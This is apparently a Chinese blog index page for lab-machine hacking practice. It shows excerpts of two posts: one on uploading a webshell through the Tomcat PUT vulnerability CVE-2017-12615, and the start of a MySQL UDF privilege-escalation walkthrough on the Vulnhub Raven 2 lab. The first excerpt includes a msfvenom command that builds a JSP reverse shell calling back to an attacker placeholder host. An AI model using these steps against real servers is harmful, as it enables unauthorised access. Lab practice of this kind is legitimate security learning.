![](https://img-blog.csdnimg.cn/20201014180756922.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
靶机实战
qweqweqqqqqqqqqq
我想成为一个很厉害的人,让世界因为有我,会变的有一点点的不一样。
展开
-
Tomcat put任意文件上传
1.Tomcat8.5.19漏洞PUT方法任意写文件漏洞(CVE-2017-12615)打开burp尝试put方法任意文件上传抓取页面,然后将Get方法改成PUT,注意文件名要/文件名/,然后内容直接空一行写在下面,返回201。冰蝎连接也可以使用msf生成jsp的木马进行连接msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机ip LPORT=端口 -f raw > shell.jsp然后msf设置监听访问最后就是使用现有的exp我原创 2021-09-10 17:07:49 · 1241 阅读 · 0 评论 -
Mysql—udf实战提权
环境靶机下载地址:https://www.vulnhub.com/entry/raven-2,269/raven : 192.168.1.24kali: 192.168.1.23信息搜集1.开放端口情况访问一下目标80端口,是一个安全的网站。经过番信息收集,在源码处发现该站点可能是基于wordpress搭建的。...原创 2020-10-18 00:28:39 · 1216 阅读 · 1 评论